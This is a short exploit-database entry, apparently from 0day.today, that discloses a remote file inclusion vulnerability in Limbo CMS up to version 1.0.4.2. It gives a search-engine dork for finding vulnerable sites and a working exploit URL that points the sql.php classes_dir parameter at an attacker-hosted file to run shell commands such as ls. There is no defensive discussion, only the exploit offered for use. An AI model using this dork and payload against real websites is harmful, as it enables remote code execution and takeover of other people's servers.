id: 388
date: 04/28/2006
title: Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
author: [Oo]
cves: 

==================================================================
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
==================================================================




Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-22]  #